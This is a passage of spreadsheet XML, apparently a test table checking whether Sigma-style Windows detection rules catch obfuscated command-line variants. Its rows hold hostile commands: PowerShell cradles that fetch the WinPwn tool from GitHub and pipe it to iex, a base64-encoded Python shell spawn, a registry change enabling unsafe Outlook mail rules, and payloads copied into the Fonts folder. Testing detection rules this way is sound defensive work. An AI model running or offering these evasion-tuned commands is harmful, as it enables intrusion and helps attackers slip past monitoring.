    <row r="1616" ht="15.75" customHeight="1" s="42">
      <c r="A1616" s="43" t="n"/>
      <c r="B1616" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C1616" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D1616" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E1616" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMANd "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F1616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1616" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1616" s="43" t="n"/>
      <c r="J1616" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1616" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1617" ht="15.75" customHeight="1" s="42">
      <c r="A1617" s="43" t="n"/>
      <c r="B1617" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_inline_vbscript</t>
        </is>
      </c>
      <c r="C1617" s="44" t="inlineStr">
        <is>
          <t>Wscript Shell Run In CommandLine</t>
        </is>
      </c>
      <c r="D1617" s="44" t="inlineStr">
        <is>
          <t>2c28c248-7f50-417a-9186-a85b223010ee</t>
        </is>
      </c>
      <c r="E1617" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMANd "$s = 'Wscript.Shell'; $o = New-Object -ComObject $s; $m = 'Run'; $o.$m.Invoke('calc.exe')"</t>
        </is>
      </c>
      <c r="F1617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1617" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1617" s="43" t="n"/>
      <c r="J1617" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1617" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1618" ht="15.75" customHeight="1" s="42">
      <c r="A1618" s="43" t="n"/>
      <c r="B1618" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1618" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1618" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1618" s="44" t="inlineStr">
        <is>
          <t>set "p1=EnableUnsafe" &amp;&amp; set "p2=ClientMailRules" &amp;&amp; reg add "HKCU\Software\Policies\Microsoft\Office\16.0\Outlook\Security" /v %p1%%p2% /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F1618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1618" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1618" s="43" t="n"/>
      <c r="J1618" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1618" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1619" ht="15.75" customHeight="1" s="42">
      <c r="A1619" s="43" t="n"/>
      <c r="B1619" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1619" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1619" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1619" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1619" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1619" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1619" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1619" s="43" t="n"/>
      <c r="J1619" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1619" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1620" ht="15.75" customHeight="1" s="42">
      <c r="A1620" s="43" t="n"/>
      <c r="B1620" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1620" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1620" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1620" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1620" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1620" s="43" t="n"/>
      <c r="J1620" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1620" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1621" ht="15.75" customHeight="1" s="42">
      <c r="A1621" s="43" t="n"/>
      <c r="B1621" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_office_outlook_enable_unsafe_client_mail_rules</t>
        </is>
      </c>
      <c r="C1621" s="44" t="inlineStr">
        <is>
          <t>Outlook EnableUnsafeClientMailRules Setting Enabled</t>
        </is>
      </c>
      <c r="D1621" s="44" t="inlineStr">
        <is>
          <t>55f0a3a1-846e-40eb-8273-677371b8d912</t>
        </is>
      </c>
      <c r="E1621" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -C "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\16.0\Outlook\Security' -Name 'EnableUnsafeClientMailRules' -Value 1 -PropertyType DWORD"</t>
        </is>
      </c>
      <c r="F1621" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1621" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1621" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1621" s="43" t="n"/>
      <c r="J1621" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1621" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1622" ht="15.75" customHeight="1" s="42">
      <c r="A1622" s="43" t="n"/>
      <c r="B1622" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C1622" s="44" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D1622" s="44" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E1622" s="44" t="inlineStr">
        <is>
          <t>copy php.exe notphp.exe &amp;&amp; notphp.exe -r "system('whoami');"</t>
        </is>
      </c>
      <c r="F1622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1622" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1622" s="43" t="n"/>
      <c r="J1622" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1622" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1623" ht="15.75" customHeight="1" s="42">
      <c r="A1623" s="43" t="n"/>
      <c r="B1623" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C1623" s="44" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D1623" s="44" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E1623" s="44" t="inlineStr">
        <is>
          <t>copy php.exe notphp.exe &amp;&amp; notphp.exe -R "system('whoami');"</t>
        </is>
      </c>
      <c r="F1623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1623" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1623" s="43" t="n"/>
      <c r="J1623" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1623" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1624" ht="15.75" customHeight="1" s="42">
      <c r="A1624" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1624" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_iex</t>
        </is>
      </c>
      <c r="C1624" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles</t>
        </is>
      </c>
      <c r="D1624" s="44" t="inlineStr">
        <is>
          <t>85b0b087-eddf-4a2b-b033-d771fa2b9775</t>
        </is>
      </c>
      <c r="E1624" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "irm test.domain/ffe | .((Get-Variable *md*).Value.Name[3,11,2]-join'')"</t>
        </is>
      </c>
      <c r="F1624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1624" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1624" s="44" t="n"/>
      <c r="J1624" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1624" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1625" ht="15.75" customHeight="1" s="42">
      <c r="A1625" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1625" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_iex</t>
        </is>
      </c>
      <c r="C1625" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles</t>
        </is>
      </c>
      <c r="D1625" s="44" t="inlineStr">
        <is>
          <t>85b0b087-eddf-4a2b-b033-d771fa2b9775</t>
        </is>
      </c>
      <c r="E1625" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$w = New-Object Net.WebClient; $w.GetType().GetMethod('DownloadString').Invoke($w, '[https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1)') | iex"</t>
        </is>
      </c>
      <c r="F1625" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1625" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1625" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1625" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution (d557dc06-62e8-4468-a8e8-7984124908ce); HackTool - WinPwn Execution (d557dc06-62e8-4468-a8e8-7984124908ce); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1625" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1625" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1626" ht="15.75" customHeight="1" s="42">
      <c r="A1626" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1626" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_iex</t>
        </is>
      </c>
      <c r="C1626" s="44" t="inlineStr">
        <is>
          <t>PowerShell Download and Execution Cradles</t>
        </is>
      </c>
      <c r="D1626" s="44" t="inlineStr">
        <is>
          <t>85b0b087-eddf-4a2b-b033-d771fa2b9775</t>
        </is>
      </c>
      <c r="E1626" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest  '[https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1](https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1)' | iex"</t>
        </is>
      </c>
      <c r="F1626" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1626" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1626" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution (d557dc06-62e8-4468-a8e8-7984124908ce); HackTool - WinPwn Execution (d557dc06-62e8-4468-a8e8-7984124908ce); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); PowerShell Download and Execution Cradles (85b0b087-eddf-4a2b-b033-d771fa2b9775); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Suspicious PowerShell IEX Execution Patterns (09576804-7a05-458e-a817-eb718ca91f54); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1626" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1626" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1627" ht="15.75" customHeight="1" s="42">
      <c r="A1627" s="43" t="n"/>
      <c r="B1627" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C1627" s="44" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D1627" s="44" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E1627" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\ps.exe &amp;&amp; C:\Windows\Temp\ps.exe - &lt; script.ps1</t>
        </is>
      </c>
      <c r="F1627" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1627" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1627" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1627" s="44" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1627" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1627" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1628" ht="15.75" customHeight="1" s="42">
      <c r="A1628" s="43" t="n"/>
      <c r="B1628" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C1628" s="44" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D1628" s="44" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E1628" s="44" t="inlineStr">
        <is>
          <t>powershell.exe "-" &lt; script.ps1</t>
        </is>
      </c>
      <c r="F1628" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1628" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1628" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1628" s="43" t="inlineStr">
        <is>
          <t>Read Contents From Stdin Via Cmd.EXE (241e802a-b65e-484f-88cd-c2dc10f9206d)</t>
        </is>
      </c>
      <c r="J1628" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1628" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1629" ht="15.75" customHeight="1" s="42">
      <c r="A1629" s="43" t="n"/>
      <c r="B1629" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_run_script_from_input_stream</t>
        </is>
      </c>
      <c r="C1629" s="44" t="inlineStr">
        <is>
          <t>Run PowerShell Script from Redirected Input Stream</t>
        </is>
      </c>
      <c r="D1629" s="44" t="inlineStr">
        <is>
          <t>c83bf4b5-cdf0-437c-90fa-43d734f7c476</t>
        </is>
      </c>
      <c r="E1629" s="44" t="inlineStr">
        <is>
          <t>type script.ps1 | powershell.exe -</t>
        </is>
      </c>
      <c r="F1629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1629" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1629" s="43" t="n"/>
      <c r="J1629" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1629" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1630" ht="15.75" customHeight="1" s="42">
      <c r="A1630" s="43" t="n"/>
      <c r="B1630" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_python_inline_command_execution</t>
        </is>
      </c>
      <c r="C1630" s="44" t="inlineStr">
        <is>
          <t>Python Inline Command Execution</t>
        </is>
      </c>
      <c r="D1630" s="44" t="inlineStr">
        <is>
          <t>899133d5-4d7c-4a7f-94ee-27355c879d90</t>
        </is>
      </c>
      <c r="E1630" s="44" t="inlineStr">
        <is>
          <t>echo import os; os.system('whoami') | python.exe</t>
        </is>
      </c>
      <c r="F1630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1630" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1630" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1630" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J1630" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1630" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1631" ht="15.75" customHeight="1" s="42">
      <c r="A1631" s="43" t="n"/>
      <c r="B1631" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C1631" s="44" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D1631" s="44" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E1631" s="44" t="inlineStr">
        <is>
          <t>py.exe -c "import pty; pty.spawn('/bin/sh')"</t>
        </is>
      </c>
      <c r="F1631" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1631" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1631" s="44" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows (480e7e51-e797-47e3-8d72-ebfce65b6d8d); Python Inline Command Execution (899133d5-4d7c-4a7f-94ee-27355c879d90)</t>
        </is>
      </c>
      <c r="J1631" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1631" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1632" ht="15.75" customHeight="1" s="42">
      <c r="A1632" s="43" t="n"/>
      <c r="B1632" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C1632" s="44" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D1632" s="44" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E1632" s="44" t="inlineStr">
        <is>
          <t>python.exe --cmd "exec(import('base64').b64decode('aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL3NoIik='))"</t>
        </is>
      </c>
      <c r="F1632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1632" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1632" s="43" t="n"/>
      <c r="J1632" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1632" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1633" ht="15.75" customHeight="1" s="42">
      <c r="A1633" s="43" t="n"/>
      <c r="B1633" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C1633" s="44" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D1633" s="44" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E1633" s="44" t="inlineStr">
        <is>
          <t>python.exe /"c" "exec(import('base64').b64decode('aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL3NoIik='))"</t>
        </is>
      </c>
      <c r="F1633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1633" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1633" s="43" t="n"/>
      <c r="J1633" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1633" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1634" ht="15.75" customHeight="1" s="42">
      <c r="A1634" s="43" t="n"/>
      <c r="B1634" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C1634" s="44" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D1634" s="44" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E1634" s="44" t="inlineStr">
        <is>
          <t>python.exe /"c" "import('pty').dict'spawn'"</t>
        </is>
      </c>
      <c r="F1634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1634" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1634" s="44" t="n"/>
      <c r="J1634" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1634" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1635" ht="15.75" customHeight="1" s="42">
      <c r="A1635" s="43" t="n"/>
      <c r="B1635" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C1635" s="44" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D1635" s="44" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E1635" s="44" t="inlineStr">
        <is>
          <t>python.exe -C "import('pty').dict'spawn'"</t>
        </is>
      </c>
      <c r="F1635" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1635" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1635" s="44" t="inlineStr">
        <is>
          <t>Python Inline Command Execution (899133d5-4d7c-4a7f-94ee-27355c879d90)</t>
        </is>
      </c>
      <c r="J1635" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1635" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1636" ht="15.75" customHeight="1" s="42">
      <c r="A1636" s="43" t="n"/>
      <c r="B1636" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_python_pty_spawn</t>
        </is>
      </c>
      <c r="C1636" s="44" t="inlineStr">
        <is>
          <t>Python Spawning Pretty TTY on Windows</t>
        </is>
      </c>
      <c r="D1636" s="44" t="inlineStr">
        <is>
          <t>480e7e51-e797-47e3-8d72-ebfce65b6d8d</t>
        </is>
      </c>
      <c r="E1636" s="44" t="inlineStr">
        <is>
          <t>python.exe --cmd "import('pty').dict'spawn'"</t>
        </is>
      </c>
      <c r="F1636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1636" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1636" s="44" t="n"/>
      <c r="J1636" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1636" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1637" ht="15.75" customHeight="1" s="42">
      <c r="A1637" s="43" t="n"/>
      <c r="B1637" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ruby_inline_command_execution</t>
        </is>
      </c>
      <c r="C1637" s="44" t="inlineStr">
        <is>
          <t>Ruby Inline Command Execution</t>
        </is>
      </c>
      <c r="D1637" s="44" t="inlineStr">
        <is>
          <t>20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8</t>
        </is>
      </c>
      <c r="E1637" s="44" t="inlineStr">
        <is>
          <t>echo puts "Test Execution" | ruby.exe</t>
        </is>
      </c>
      <c r="F1637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1637" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1637" s="43" t="n"/>
      <c r="J1637" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1637" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1638" ht="15.75" customHeight="1" s="42">
      <c r="A1638" s="43" t="n"/>
      <c r="B1638" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1638" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1638" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1638" s="44" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.dll %windir%\Fonts\</t>
        </is>
      </c>
      <c r="F1638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1638" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1638" s="44" t="n"/>
      <c r="J1638" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1638" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1639" ht="15.75" customHeight="1" s="42">
      <c r="A1639" s="43" t="n"/>
      <c r="B1639" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1639" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1639" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1639" s="44" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\</t>
        </is>
      </c>
      <c r="F1639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1639" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1639" s="44" t="n"/>
      <c r="J1639" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1639" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1640" ht="15.75" customHeight="1" s="42">
      <c r="A1640" s="43" t="n"/>
      <c r="B1640" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1640" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1640" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1640" s="44" t="inlineStr">
        <is>
          <t>move C:\temp\payload.exe C:\Windows\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F1640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1640" s="43" t="n"/>
      <c r="J1640" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1640" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1641" ht="15.75" customHeight="1" s="42">
      <c r="A1641" s="43" t="n"/>
      <c r="B1641" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_hiding_malware_in_fonts_folder</t>
        </is>
      </c>
      <c r="C1641" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder</t>
        </is>
      </c>
      <c r="D1641" s="44" t="inlineStr">
        <is>
          <t>ae9b0bd7-8888-4606-b444-0ed7410cb728</t>
        </is>
      </c>
      <c r="E1641" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy C:\temp\payload.bat C:\Windows\F^onts\</t>
        </is>
      </c>
      <c r="F1641" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1641" s="44" t="inlineStr">
        <is>
          <t>Writing Of Malicious Files To The Fonts Folder (ae9b0bd7-8888-4606-b444-0ed7410cb728)</t>
        </is>
      </c>
